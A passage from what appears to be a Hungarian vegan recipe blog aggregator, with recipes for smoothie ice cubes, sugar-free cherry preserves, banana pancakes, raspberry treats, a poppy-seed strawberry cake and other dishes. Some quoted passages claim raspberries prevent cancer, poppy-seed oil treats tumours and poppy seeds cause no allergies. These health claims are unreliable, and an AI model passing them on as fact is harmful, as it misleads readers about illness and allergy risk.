vodka, likőr vagy gyógytea is. Többnyire cukorsziruppal, mézzel édesítik. Fagyasztás alatt állandó keverést igényel. Parfé: Hasonló alapanyagokból készíthető, mint a fagylalt, 5-6 óra hűtést igényel. Általában valamilyen sütemény formában készül, így a fagyasztás után tortaként szeletelhető." Forrás: 100fok gyümölcs smoothie jégkrém (vegán, nyers) Házi fagyik terén nagyon kezdő vagyok. Ígérem a jövő nyárra tovább fejlődöm, addig pedig fogadjátok sok szeretettel első próbálkozásaimat! ;-) Hogy mi lett belőle? Hát nem tudom, minek is nevezzem? Az előbb megmutattam nektek a nyári hűsítők legfőbb kategóriáit, és ti is láthattátok, hogy az én receptem egyikbe sem illik bele! :-D Ez egy gyümölcsös, mindenmentes, egészséges, diétás, finom, hűsítő édesség, ami egyszerűen elkészíthető egy jégkockatartó segítségével bármilyen gyümölcsből! Azt hiszem a leginkább a "hűsítő smoothie kockák" elnevezés illik rá a legjobban. Sem hozzáadott cukrot, sem ételszinezéket, vagy mesterséges ízfokozót nem tartalmaznak ezek az egészséges és könnyen emészthető, gyomorbarát fagyasztott gyümölcs kockák! (Ha nagyon muszáj skatulyát húznom rá, akkor talán a sorbetre hasonlít leginkább.)  HOZZÁVALÓK: (1 tálca smoothie jégkockához) - 1 db érett banán  - 1 db érett mangó húsa /­­ vagy 150 g málna /­­ vagy 3 db érett kivi /­­ vagy 1/­­2 kisebb érett sárgdinnye (a képeken, ezekből a gyümölcsökből készült jégkrémek láthatóak) - 1 dl mandula tej - 1 dl tiszta víz házi készítésű, gyümölcs smoothie jégkrém, "nyers tejszínhabbal" (mindenmentes, vegán, nyers) ELKÉSZÍTÉS:A hozzávalókat bele tesszük a turmix gépünkbe, pontosan ugyanúgy, mint ahogyan a gyümölcs turmixokat készítjük. A kész turmixokat beletöltjük a szilikonos jégkockatartó formába és mehet is be a fagyasztóba. Másnap már fogyasztható is az intenzív gyümölcs ízű házi jégkrém! Többféle formában is felszolgálhatjuk a vendégeknek. Tálalhatjuk fagyis kelyhekben a különböző ízesítésű smoothie kockákat, vagy ha van otthon akkor elkészíthetjük pálcikás jégkrémtartóban is. Tehetünk rá "nyers tejszínhabot", amit ezesetben egy leturmixolt banán helyettesít. Sokkal lágyabb, és krémesebb lesz tőle a házi hűsítőnk! :-) gyümölcs smoothie jégkrém, "nyers tejszínhabbal" (mindenmentes, vegán, nyers) Ha nincs kedvünk a gyümölcs kockákat lassacskán elfogyasztani, akkor turmixoljuk szét őket egy kevés vízzel, és már kész is a hideg és gyümölcsös jégkása, hozzáadott cukor nélkül! házi készítésű, gyümölcsös jégkása (mindenmentes, vegán, nyers) Kis esernyőkkel, szívószálakkal, különböző színes és nyárias kiegészítőkkel feldíszítve, a gyerekzsúrokon is nagy sikert fogunk aratni. ;-) A felhasznált ízeket és színeket, azaz a gyümölcsöket, kedvünk szerint variálhatjuk. Készíthetünk például szedfres, áfonyás, dinnyés, epres, barackos, ananászos, de akár papajás vagy citromos gyümölcs smoothie jékrémet is. A lehetőségek határtalanok... házi készítésű, gyümölcs smoothie jégkrém (mindenmentes, vegán, nyers) Táplálkozz, ne csak étkezz! És eszerint gondoskodj a vendégeidről is!  ;-)

Különleges ízesítésű, cukormentes, mindenmentes meggybefőtt

2015. június 29. Éltető ételek 

Különleges ízesítésű, cukormentes, mindenmentes meggybefőttNagyon sok meggyünk lett, így nemcsak a fagyasztóba került belőle, hanem befőttet is készítettem. Visszaemlékezve anyukám meggybefőttjére, melyhez egy cukros szirupot kellett készíteni... nos, ez egy sokkal egyszerűbb és egészségesebb változat.  Nincs benne se víz, se cukor, se tartósítószer. Csupán egy kevéske szegfűszeg, stevia levél és vanília. Hozzávalók (1 üveghez) - 7 dl-es üveg fedővel - 0,5 kg meggy - 1 kávéskanál stevia levél őrlemény - 4-5 szegfűszeg - 1 cm-es vaníliarúd Elkészítése: - Először is kifőztem az üvegeket és a kupakokat, majd tiszta konyhatörlőre, lefelé fordítva várták, hogy megtöltsem őket meggyel. - A meggyet alaposan átválogattam és megmostam. Amennyiben nem ismerjük a meggy származását, érdemes em-bios vízbe áztatni, hogy az esetleges vegyszermaradványokat leszedje. - Egy üveg aljára tettem 1 kávéskanál stevia levél őrleményt, 4-5 szegfűszeget és 1 cm hosszú vaníliarudat. - Ezután beletettem kb. fél kiló meggyet, jó szorosan. - Rátettem a fedőt, majd óvatosan beállítottam az üvegeket a forrásban lévő vízbe. A víz egészen a kupakig ért. Ezt főztem lassú tűzön kb. 25-30 percig. Ezt a műveletet a sütőben is elvégezheted. - Ezután ráhúztam a fedőt, ahogy csak bírtam, majd fejre állítottam az üveget úgy 5 percre. - Ezt követte a száraz dunszt, amíg teljesen ki nem hűlt. Ez azt jelenti, hogy jó sok plédbe tettem, hogy minél lassabban hűljön ki.A meggy a főzés során nem biztos, hogy levet fog ereszteni, de a száraz dunszt után legalább félig lesz az üveg az isteni finom meggy nedüvel. Tehát ne felejtsük, NEM KELL BELE VÍZ, a lé, ami benne van, az 100%-os meggylé. A stevia használata során semmiképp ne a fehér port vagy a cseppet használd, mert az már egy élelmiszeripari vegyület, semmi természetes nincs benne. A valódi stevia egy zöld színű por, semmi más nincs benne!

Reggelire fel! - Fehérjedús Banán palacsinta, házi áfonya lekvárral (finomított cukor -, fehér liszt-, és tartósítószer - mentes)

2015. június 24. Zöld Avocado 

Reggelire fel! - Fehérjedús Banán palacsinta, házi áfonya lekvárral (finomított cukor -, fehér liszt-, és tartósítószer - mentes) Fehérjedús banán palacsinta, házi áfonya lekvárral (finomított cukor-, fehér liszt-, és tartósítószer - mentes) Milyen gasztroblog az, ahol nem találunk palacsinta recepteket??? Rájöttem, hogy palacsinta témában tartozom nektek, mert nem nagyon láttalak el titeket ötletekkel... Eddig! ;-) Pedig milyen sokféle képpen, változatos ízben, különböző töltelékkel, egészséges alapanyagokból, rendhagyó formákban és más más diétába beilleszthető módon el lehet készíteni ezt az egyszerű édességet, reggelit, vagy akár főételt is!   A világ különböző pontjain ünneplik a farsangi szezon lezárásaként az ún. "Pancake Day"-t, azaz a "Palacsinta Nap"-ot. Angliában, Írországban, Amerikában, de még Brazíliában is találkozhatunk ezzel az ünneppel. Ha pedig ennyire szeretik mindenhol a palacsintát, akkor mi se maradhatunk ki belőle! ;-)   Fehérjedús banán palacsinta (finomított cukor-, búzalisztmentes)  Készíthetjük amerikai stílusban, vastag tésztával megkenősen; holland módon kis pamacsokként mártogatósan (poffertjes); magyar módon, vékony tésztával feltekerősen; rakott palacsintaként, vagy akár palacsinta tortát is építhetünk. Lehet egyszerűen édes, vagy sós, gyümölcsös, vagy fűszeres, de még húsos is. ;-)  "túrórudi" zab palacsinta torta Korábban hoztam nektek egy látványos, kakaós-túrós túrórudi zabpalacsinta tortát, most pedig az egyik nagy kedvencünkkel, a banán palacsintával ismertetlek meg titeket. :-) A hagyományos, mindenki által ismert palacsinta tészta nehezen emészthető, tápanyag szempontjából értéktelen, fehér búzalisztet, és gyakran fehér cukrot tartalmaz. Ha szeretnénk tápláló palacsintákat fogyasztani, ismerkedjünk meg néhány reform, diétás, vagy paleo palacsinta recepttel, és ezentúl készítsük inkább emészthetőbb formában őket! Most egy magas fehérje- és rosttartalmú, energiadús, gyorsan elkészíthető, hosszú ideig jóllakottság érzést nyújtó, tápláló reggelinek is tökéletes palacsintát hoztam nektek, melyet gyakran elkészítek, főleg, mikor elutazunk valahová. Tökéletes útravaló! ;-)  Fehérjedús banán palacsinta, házi áfonya lekvárral (finomított cukor-, fehér liszt-, és tartósítószer - mentes)  Önmagában, melegen és hidegen is nagyon finom a banán palacsinta! :-) De ezúttal házi áfonya lekvárt készítettem mellé, mert itt az allergia időszak, és az áfonya, a magas Kalcium tartalmának köszönhetően csökkenti a bosszantó allergiás tüneteket. Meg egyébként is közeledik az áfonya szezon, amit már úgy vártunk! :-) HOZZÁVALÓK (kb.20 db 7 cm átmérőjű amerikai palacsintához): - 3 db érett banán - 60 g zab (porrá darálva) - 1 ek kókusz olaj  - 3 db bio tojás -  1/­­2 tk szódabikarbóna - kevés zsiradék (kókusz olaj) a sütéshez -  - 150 g fekete áfonya - 1 ek útifűmaghéj vagy chia mag - 1 ek tiszta víz Fehérjedús banán palacsinta, házi áfonya lekvárral (finomított cukor-, fehér liszt-, és tartósítószer - mentes)  ELKÉSZÍTÉS: Kaptam egy szuper kis palacsinta sütőt, mellyel amerikai palacsintákat süthetek könnyedén, szinte zsiradékmentesen, jópofa "smiley face" formában. Nagyon szeretem! :-) Természetesen jó minőségű teflon palacsinta sütőben is elkészíthetjük a banán palacsintáinkat. Ezesetben a tésztából kanalazzunk kis tenyér méretű plecsniket a palacsintasütőbe, és süssük a megszokott módon. (Egyik oldal aranybarna... megfordít, másik oldal aranybarna). Ne próbáljunk meg ebből a tésztából nagy és vékony, hagyományosan feltekerhető palacsintát készíteni, mert nem fog sikerülni. Ahhoz túl zömök és vastag ez a tészta.     Fehérjedús banán palacsinta (finomított cukor-, búzalisztmentes)  És akkor nézzük a lassan felszívódó, laktató banán palacsinta tésztánkat. Tegyük az érett banánokat a tojásokkal a turmix gépbe, és turmixoljuk egynemű krémmé. Daráljuk a zabot, zabliszt állagúra. Keverjük össze egy keverő tálban a darált zabot, a banános tojással, a szódabikarbónával, a kókusz olajjal, és hagyjuk állni kb. 10 percet, hogy a zab megszívhassa magát.       Melegítsük fel a palacsintasütőnket, kenjük ki kevés zsiradékkal, és közepes hőmérsékleten süssük aranybarnára az amerikai stílusú, vastag palacsintáinkat. Süssük ki az összes tésztát, és akár már fogyaszthatjuk is a finom és puha palacsintáinkat! ;-)  Házi áfonya lekvár (finomított cukor-, és tartósítószer - mentes)  A cukor- és tartósítószermentes házi áfonya lekvárhoz a megmosott fekete áfonyát turmixoljuk össze 1 evőkanál vízzel, és 1 ek útifűmaghéjjal vagy chia maggal. Tegyük be a hűtőbe egy fél órára és kész is a vitaminban gazdag, cukormentes áfonya lekvárunk. (Ha nincs otthon útifűmaghéj, vagy chia mag, akkor is elkészíthetjük, de akkor kevésbé fog meglekvárosodni az áfonya turmix. Inkább áfonya püré állagot fogunk kapni.) Fehérjedús banán palacsinta, házi áfonya lekvárral (finomított cukor-, fehér liszt-, és tartósítószer - mentes)  Energiadús, tápanyagban gazdag palacsintázást kíván nektek a Zöld Avocado! :-)     

Egyszerű és tápanyagban gazdag MÁLNÁS APRÓSÁGOK, 3+1 hozzávalóból (mindenmentes, vegán, nyers)

2015. június 5. Zöld Avocado 

Egyszerű és tápanyagban gazdag MÁLNÁS APRÓSÁGOK, 3+1 hozzávalóból (mindenmentes, vegán, nyers)természetes és egészséges málna lekvár Ebben a bejegyzésben nem találtok különleges recepteket, életmódváltó gondolatokat, hasznos konyhai tippeket. Ebben a bejegyzésben 4 egyszerű ötletet találtok, melyek segítségével változatosabban élvezhetjük a friss és vitamindús málna természetes ízét, illatát és az egészségre gyakorolt jótékony hatását. Egy reggeli málnás gyümölcs turmix, egy cukor- és tartósítószermentes málna lekvár, egy könnyű és nyers málnás desszert, és a forró nyári napokra, egy egyszerű málna jégkrém nem csak gyerekeknek. Mindez 3+1 alap hozzávalóból!  Látványos, egyszerű, természetes, egészséges és élő receptek mindenkinek, aki szereti a málnát! :-)  Nemcsak, hogy glutén-, laktóz-, cukor-, tojás-, élesztő- stb. mindenmentesek a receptek, de a nagyon finom málna gyümölcs, a természetes tápanyagtartalmát is megőrzi ezekben az ételekben, így segítve téged, hogy a tested minél több tápanyaghoz jusson, miközben az élvezeti érték is megmarad.  És hogy miért jó málnát fogyasztani? természetes és egészséges málna lekvár (cukormentes, tartósítószer mentes, nyers, vegán) "A málna, sok piros gyümölcshöz hasonlóan rengeteg C-vitamint és antioxidánst tartalmaz, így erősíti az immunrendszert és megelőzi a rákos megbetegedéseket. Kitűnő vértisztító, vérszegénység ellen is hatásos és csillapítja a lázat. A-vitamin tartalma révén segít a látásjavításban. Különböző vérzések csillapítására is alkalmazható. Ezeken kívül jelentős mennyiségű B1, -és B2-vitamint is tartalmaz.  Rendkívül gazdag színanyagokban, flavonoidokban, gyümölcssavakban, cserzőanyagokban és növényi rostokban. Pektin is található benne, ez az anyag emésztésjavító hatásáról ismert.  Az ásványi anyagok közül a kálcium-,kálium-, megnézium- és vastartalma kiemelkedő, mennyiségét tekintve pedig a szervezet napi szükségletének 10 %-át fedezi. Jól teszed, ha frissen és nyersen fogyasztod, ugyanis így érvényesül leginkább a benne lévő vitaminok jótékony hatása. Kevesen tudják, hogy másnaposság ellen és antibiotikum kúra után is jó szolgálatot tesz, mert segít helyreállítani a megterhelt emésztőrendszert és a károsodott bélflórát.  Sőt, még szépülhetünk is vele! Ez a szépségvitaminként emlegetett magas biotintartalmának köszönhető, amely szépíti a bőrt, csillogóvá és dússá teszi a hajat.  Antocianintartalma révén mérsékli a magas vérnyomást. Emellett szabályozza a vércukorszintet, enyhíti a menstruációs görcsöket." Forrás: Bien.hu Akkor nézzük, hogyan is készíthethetünk energiadús, A-, C-, B- vitaminban és ásványi anyagokban gazdag friss reggeli turmixot málnából?  friss és energiadús málnás gyümölcs turmix reggelire  Málnás gyümölcsturmix HOZZÁVALÓK: (2 főre) - 2 db érett banán  - 100 g friss málna  - 4 dl rizstej vagy kókusztej ELKÉSZÍTÉS:  A megmosott málna szemeket, az érett banánnal, és a választott növényi tejjel tegyük a turmix gépbe és kb.1 perc alatt készítsük el az ízletes és tápláló reggeli italunkat.  friss és energiadús málnás gyümölcsturmix reggelireEgészségetekre! ;-) Málnás gyümölcsturmix + agar-agar Ha szeretnénk ezt a szuper piros gyümölcsöt, puding vagy lekvár formájában hozzáadni a reggeliző pelyhünkhöz, a gluténmentes palacsintánkhoz, vagy a vendégváró desszertünkhöz, nincs egyéb teendőnk, mint az előző turmix italhoz keverjünk agar-agar-t, természetes kocsonyásító anyagként (zselatin helyett).  Ebben az esetben inkább pudingnak hívnám a krémes, könnyed málnás végeredményt. Ha kicseréljük az alap málnás turmixban a növényi tejet, vízzel, és úgy készítjük el a turmixot, majd teszünk hozzá agar-agar-t, akkor pedig málna lekvárt kapunk. Mindkettő nagyon finom. ;-) természetes és egészséges málna lekvár (cukormentes, tartósítószer mentes, nyers, vegán) "A zselatin nem más, mint tiszta, színtelen, szagtalan enyv, amit tisztított csontokból és borhulladékokból állítanak elő. Az agar-agar viszont a trópusi és szubtrópusi tengerpartok közelében élő moszatfélék szárított kivonata, amit elsősorban vörösmoszatokból nyernek." Az algát a napon megszárítják, extrahálják, majd mechanikai úton préselik, és finom porrá őrlik. A kíméletes eljárás során az algában lévő ásványi anyagok, zsírsavak és jód megmarad.  (Bővebben a kocsonyásító anyagokról itt olvashatsz: Rosta Erzsébet) Az agar agar felhasználásáról  pontos információt  a csomagolásáról kaphatsz. Attól függően, hogy agar agar porod vagy pelyhed van, más és más arányokat kell használni. Nekem pelyhem volt, amiből 1,5 evőkanállal 1 dl vízben oldottam fel.  Belekevertem a forró vízben feloldott, de még híg agar-agar-t a málna turmixba, összekevertem az egészet, és betettem a hűtőbe. Fél óra múlva már fogyasztható is, a cukor- és tartósítószer mentes, természetes alapanyagokból készült málna lekvár /­­ puding, telis tele értékes tápanyagokkal.  természetes és egészséges málna lekvár (cukormentes, tartósítószer mentes, nyers, vegán) Táplálkozz, ne csak étkezz! :-) Málnás gyümölcsturmix + kókusz zsír Készítsük el a már jól ismert málnás turmixunkat a 3 hozzávalóból, de ezúttal csak 2 dl növényi tejet tegyünk bele, majd keverjünk hozzá 2 ek kókusz olajat. Töltsük meg a szilikonos muffin formáinkat, tegyük be őket  hűtőbe egy éjszakára. Másnap, fogyasztás előtt könnyedén fordítsuk ki a málnás desszertünket a szilikon formákból a desszertes tányérra, és fogyasszuk őket jóízűen pl.: apróra tört kesu dióval.     egészséges málnás desszert (cukormentes, gluténmentes, laktózmentes, nyers, vegán ) Málnás gyümölcsturmix + fagyasztó Töltsük az elkészített málnás gyümölcs turmixunkat szilikonos kreatív jégkocka tartóba, tegyük be egy éjszakára a fagyasztóba, és másnap már élvezhetjük is a jéghideg málnás édességünket.  egészséges málna jégkrém (cukormentes, laktózmentes, gluténmentes, vegán) Látjátok milyen egyszerűen készíthetünk tápanyagban gazdag, energiadús, és finom édességeket, reggeliket természetes hozzávalókból? Nem kell ehhez konyhai jártasság, vagy biológiai és kémiai ismeretek, elég ha egy kicsit elrugaszkodunk a már ismert és bevált módszerektől, ételektől... Engedjük szabadjára a fantáziánkat, és kotyvasszunk a természetből! ;-)      Megjegyzés1:  "Az  agaragar  tengeri  vörösmoszatokból nyert poliszacharid-keverék.  Az agaragar egy sárgásfehér, félig áttetsző zselés anyag. Élelmiszerekben sűrítőanyagként, zselésítő anyagként, stabilizálószerként alkalmazzák E406 néven. Előfordulhat ételzselékben,   lekvárokban,   aszpikban, cukrászipari termékekben.  80% rosttartalommal rendelkezik, így táplálékkiegészítőként emésztési rendellenességek ellen is alkalmazzák. Emésztést követően   vizet  szív magába, ettől nő a telítettség érzése."  Forrás: Wikipedia Megjegyzés2: A bejegyzésben szereplő lekvár nem alkalmas hosszú távú felhasználásra, mivel sem cukrot, sem tartósítószert nem tartalmaz. 1-2 napon belül fogyasztandó!    

Nagyon mákos nagyon epres tortácska (laktózmentes, cukormentes, vegán)

2015. május 22. Zöld Avocado 

Nagyon mákos nagyon epres tortácska (laktózmentes, cukormentes, vegán)nagyon mákos nagyon epres tortácska (laktózmentes, cukormentes, vegán) Nagy örömünkre még mindig eper szezon van! :-) Pár bejegyzéssel ezelőtt hoztam nektek egy csokis-epres, nyers, vegán pohárkrémet, amit nagyon szerettetek. Olyan nagy sikere volt, hogy gondoltam nem bánjátok ha készítek nektek egy újabb epres édességet. Ezúttal nem voltam olyan szigorú, és bár ez a sütemény, nem nyers, és nem is gluténmentes, azért még mindig könnyen emészthető, cukor-, fehér liszt- és laktózmentes, illetve rengeteg tápanyagban és vitaminban gazdag hozzávalót tartalmaz! A sütés és a kézügyesség nem az erősségem, ezért valószínűleg nem leszek cukrász, de azért remélem tetszeni fog nektek ez a nagyon mákos, nagyon epres sütemény. Mák imádók előnyben! ;-) nagyon mákos nagyon epres tortácska (laktózmentes, cukormentes, vegán) "A mák tápanyagtartalma: o 1 teáskanál mák 0,6 gramm makromolekulát, 3,7 gramm zsírt, 2,5 gramm szénhidrátot és 46 kalóriát tartalmaz. o A mákban nagy mennyiségben találhatóak ásványi anyagok, például 29% mangán és 13% kalcium. o A mák nem okoz allergiás tüneteket, ezért a várandós nők és a gyerekek is fogyaszthatják. A mák egészségre gyakorolt jótékony hatása: 1. A mák hatékonyan oltja a szomjat, csökkenti a lázat, a gyulladást, enyhíti a székrekedést és az alhas irritációját. 2. A mák az egyik fontos hozzávalója a hűsítő és nyugtató gyógyszereknek. 3. A mák olyan ásványi anyagokkal látja el a szervezetet, mint a jód, mangán, cink, magnézium és réz. 4. A mák magjaiból kivont olaj hatékony a rákos daganatok kezelésében, mivel egyszeresen telítetlen zsírsavakat tartalmaz. 5. A mákkal ízesíthető a kenyér, keksz, muffin, sütemény és más ételek is. 6. Az Ajurvédikus gyógyászatban a mákok néha megőrlik, majd tejjel elkeverve krémet készítenek belőle, amely bőrmegújító hidratálókrémként funkcionál. 7. A mák linolén savat tartalmaz, amellyel hatékonyan meggátolható a szív- és alhasi problémák kialakulása. 8. A mák egész nagy mennyiségű zsírsavat tartalmaz, amelyek a szervezet mentális állapotának fenntartásához szükségesek. Ezenkívül a mák gazdag omega-3 zsírsavakban. 9. A mákot narkotikumként is használják fájdalom esetén. Ezenkívül a légzési problémák, fertőző betegségek, hasmenés és alvászavar kezelésénél használják. 10. A mák viszonylag kevés mennyiségű alkaloidot tartalmaz, ezért számos idegprobléma kezelésénél használják. 11. A mákkal hatékonyan kezelhető az ekcéma, mivel a máknak magas a linolén sav tartalma.  12. A mák, jó hidratáló. 13. Mákos bőrradírral a bőre tiszta és ragyogó lesz. 14. Mákos hajpakolás rendszeres használatával jelentősen visszaszorítható a korpásodás mértéke. 15. Serkenti a hajnövekedést"  Forrás:  Dr.Tihanyi nagyon mákos nagyon epres tortácska (laktózmentes, cukormentes, vegán) HOZZÁVALÓK: tésztához: (18 cm-es torta formához) - 2 db érett banán leturmixolva  - 2 ek Agave szirup (vagy magas minőségű méz)  - 1 dl növényi tej (pl.: mandula tej)  - 100 g mandulaliszt (darált mandula)   - 1 kk szódabikarbóna  - 100 g zabliszt (darált zabpehely)  - 80 g mák (meg is darálhatjuk, de szerintem egész szemű mákkal finomabb)  - 2 dl natúr szója joghurt  - 1 db citrom reszelt héja (kezeletlen héjú citrom)  epres töltelékhez: - kb. 500 g friss és édes eper  - 100 g friss málna - 2 ek Agave szirup  - 2 ek útifűmaghéj  ELKÉSZÍTÉS: Egyáltalán nem bonyolult ez a torta, bárki elkészítheti, aki türelmes. Hogy miért kell türelmesnek lenni? Mert sokat kell közben várni... várni míg kihűl...várni míg összeáll...várni míg... és végre: megehetjük! :-)  nagyon mákos nagyon epres tortácska (laktózmentes, cukormentes, vegán) A tészta, egy már korábban készített mákos-banános süti receptje alapján készül. A banán pépet keverjük össze az édesítővel, a mandula tejjel, és a joghurttal. Egy másik edényben keverjük össze a liszteket, a szódabikarbónával, a citrom reszelt héjával, és a mákkal. Majd a két tál tartalmát öntsük egybe, és addig keverjük őket, míg egynemű nyers tésztát nem kapunk. A sütőt melegítsük elő 180°C-ra, és 25 perc alatt süssük készre a torta alapot a kókuszzsírral kikent torta formánkban. Ezekhez az adagokhoz én egy 18 cm-es torta formát használtam. Attól függően, hogy te kedves olvasó mekkora formát használsz, attól függően lesz a torta tészta alacsonyabb, vagy magasabb. Amikor elkészült a tészta, hagyjuk egy kicsit hűlni a formában, majd vegyük ki a formából, és hagyjuk teljesen kihűlni. (Tegyük hűvösebb, de nem hideg helyre, hogy gyorsítsuk a folyamatot). Miután teljesen kihűlt egy nagy kés segítségével vágjuk 2-3-4 rétegbe a torta lapot, attól függően, hogy milyen magas lett a tészta.  (A szép vágáshoz használhatunk egy nagy és éles kést, ami túlnyúlik a tésztán, vagy egy erős cérnát, amit keresztül húzunk a torta tészta belsején, átlóban.)  Hagyjuk a szétvágott tészta lapokat is teljesen kihűlni, és kicsit megszáradni.  Miközben hűl a torta tészta, készítsük el a nagyon egyszerű epres tölteléket. :-) Tegyünk félre az eperből későbbre díszítésnek a torta tetejére. A többi epret a málnával (miután megmostuk) törjük össze egy tálban egy villával, úgy, hogy maradjanak benne nagyobb darabok is. Keverjük hozzá az Agave szirupot, és 2 ek útifűmaghéjat, ami segít bekocsonyásítani az eperkrémet. Tegyük az egész eper masszát a hűtőbe min.1 órára. Miután letelt az 1 óra, és az eper állaga "ellekvárosodott" a hűtőben, kenjük meg a tészta rétegeket bő epres töltelékkel, rakjuk össze a tortát, és díszítsük a tetejét friss eper darabokkal. (Ez a tészta egy puha tészta a zab és mandula miatt, ezért bánjunk vele óvatosan. Ha az eperkrém túl híg, mert az eper vagy a málna túl vizes volt, akkor csepegtessük le egy szűrőben a felesleges folyadékot .) Miután úgy néz ki a torta, ahogy mi szeretnénk tegyük vissza az egészet a hűtőbe. Kb. 2-3 óra múlva már tálalhatjuk is ezt a nagyon mákos nagyon epres desszertet! :-) nagyon mákos nagyon epres tortácska (laktózmentes, cukormentes, vegán) Tápanyagban gazdag, jó nassolást kívánunk! ;-)  Megjegyzés1: Mint minden mákos ételbe, ebbe a süteménybe is belecsempészhetünk chia magot, ezzel is növelve az édesség tápanyagértékét. Megjegyzés2: Válasszunk friss, kis gazdaságból, bio piacról származó epret, hogy a természetes íze, zamata, és illata megédesítse a süteményünket. Íztelen és kemény eperből nem lesz finom desszert, mert ebben a receptben is a naturális íze dominál a gyümölcsnek!

Nyers limetorta

2015. május 14. Vegan Spirit 

Nyers limetortaAz itt megadott mennyiségek egy 22cm-es (8-10 szeletes) tortához elegendőek!   Hozzávalók az alaphoz: 200g apróra darált dió 1ek holland kakaó 50g darált lenmag 1csésze friss datolya, kimagozva A krémhez: 4 lime leve 4ek kókuszolaj 1ek útifűmaghéj liszt 3db közepes, érett avokádó 2db érett (barna pöttyös héjú) banán fél csésze friss datolya, kimagozva     A fedőréteghez: 1dl víz 1,5dl kókuszolaj fél csésze friss datolya, kimagozva 1kk őrölt szegfűbors A nyers limetorta elkészítése: Az alap minden összetevőjét egy tálba tesszük, és kézzel  jól összedolgozzuk. Ha ez megvan, akkor a tortaforma alján, egyenletesen szétterítjük A krém összetevőit, az útifűmagháj liszt kivételével turmixgépben homogénre turmixoljuk, majd egy tálba öntjük, és belekeverjük az útifűmaghéj lisztet is. Jól elkeverjük, majd beleöntjük a tortaformánkba és egyenletesen elterítjük. A fedőréteg alapanyagait is turmixgépbe dobjuk, és összeturmixoljuk. Ha készen van, akkor a torta tetejére öntjük, kedvünk szerint díszítjük és hűtőbe rakjuk, minimum 2-3 órára. Áldott étkezést! Kakuk Bálint     Nyers, nyersvegán, nyers recept, nyers torta, nyers vegán, recept, vegan, vegán, vegán recept, cukormentes, laktózmentes, gluténmentes.

Szilvalekváros-diós pite

2015. április 12. Éltető ételek 

Szilvalekváros-diós piteHa gyorsan kell valami finom és laktató, akkor ezt készítsd el. 1 óra elteltével már tálalhatod is. Bármilyen lekvárral elkészítheted, én most házi, cukormentes lekvárt tettem bele. Ha van a hűtőben valódi tejszín, vagy kókuszkrém, akkor igazán finom uzsonna kerekedik ki belőle. Hozzávalók: Tészta: - 10 dkg aprószemű zabpehely - 15 dkg teljes kiőrlésű tönkölyliszt - 12 dkg bio vaj - 8 dkg juharszirup vagy méz - 1 kávéskanál vaníliapor - 1/­­2 kávéskanál szódabikarbóna - csipet só Töltelék: 1 kis üveg házi, cukrozatlan szilvalekvár (aszalt, mindenmentes szilvából is készíthetsz lekvárt) - fahéj - 1-2 marék durvára tört dió Elkészítése: Először morzsold el a vajat a liszttel, majd a többi összetevővel együtt gyúrj egy puha tésztát. Ha van időd, tedd be a hűtőbe úgy fél órára. Ha nincs, az sem baj, teheted is a piteformába.Vedd elő a formádat, és a tészta 3/­­4-ét nyomkodd bele. Csinálj neki egy kis peremet is.A lekvárt keverd el dióval és a fahéjjal, majd simítsd rá a tésztára.A tetejére reszeld rá a maradék tésztát.Előmelegített sütőben 180 fokon süsd úgy 25 percig. Nézz rá, amikor már kezd színe lenni a tésztának, akkor már jó.Kínáld tejszínnel vagy kókuszkrémmel.

Sült retek (a húsvéti asztalra) + húsvéti recept ajánló

2015. április 3. Zizi kalandjai 

Sült retek (a húsvéti asztalra) + húsvéti recept ajánló Végtelenül egyszerű recept és kiváló finomság az ünnepi tavaszi asztalra. A retket többnyire nyersen esszük, azonban fenséges köretet is varázsolhatunk belőle egy kis hőkezelés  hatására. Én olívaolaj és umeboshi ecet keverékében sütöttem meg. Állj! Mi a franc az az umeboshi? És ráadásul még ecet is? Elmesélem, hogy mi ez és azt is megosztom veletek, hogy mivel tudjátok helyettesíteni, ha hirtelen nem tudjátok beszerezni (húsvétig). Az umeboshi egy japán szilva fajta és legelőször Makitól hallottam róla. Ez egy gyümölcs, amit többnyire shiso levéllel együtt érlelnek, ettől lesz a gyümölcsnek – majd az ecetnek is – fakó piros színe.  A nyers gyümölcs ízét nem ismerem, de az ecet egyszerre savanyú és sós, nekem nagyon bejön. Nem csodaszer, de pozitív az élettani hatása… a benne lévő tápanyagok felerősítik immunrendszerünket, így ellenállóbbak leszünk a betegségekkel szemben. Segít a bélműködés helyreállításában, semlegesíti az elsavasodott állapotot, megnyugtatja a beleket és a méreganyagok eltávolításához is hozzájárul. Egyébként aszalják is, valamint készül belőle gyümölcslé és likőr is az eceten kívül. Beszerezhető reformboltokból, bioboltokból, online áruházakból (többféle márka létezik, én már kettőt is próbáltam, mindkettő ugyanolyan finom volt). Ebben a receptben pedig helyettesíthetitek szójaszósz vagy tamari (gluténmentes szójaszósz) és citromlé keverékével. Jó pihenést az ünnepekre, egyetek finomakat! A receptet a Marie Claire oldalán olvashatjátok el! Ide pedig összegyűjtöttem néhány finomságot, amelyek jól mutatnak a húsvéti asztalon… Vegán kötözött sonka (egyszer biztosan ki fogom próbálni…) Vegán húsvéti vagdalt, hamis tojássaláta és sárgatúró kölesből Grétától A mindig nyerő diósült Húsvéti vöröslencse vagdalt Foszlós kalács és briós Fokhagymás kalács és medvehagymás juhtúróval töltött kápia paprikák Annától Húsvéti vegán kalács Marcipános narancsos kalácsok Limarától Sárgarépás magvas kenyér Limarától Párolt retek Gyors retek savanyúság Vegán retekkrémleves Gyömbéres répatorta Vegán kókuszos répa muffin Ropogós diós-kakaóbabtöretes üreges csokitojások Zsuzsitól Vegán cukormentes csokoládé tojások kesukrémmel, datolya karamellel (angol) Vegán – szinte nyers – cukormentes csokoládé tojások (angol) Nyers répasüti citromos kesudió krémmel (angol) Avokádós töltött tojás (angol) Vegán spenótos mártogatós (angol)

Vegán bababarát mandulás banánkenyér

2015. március 7. Zizi kalandjai 

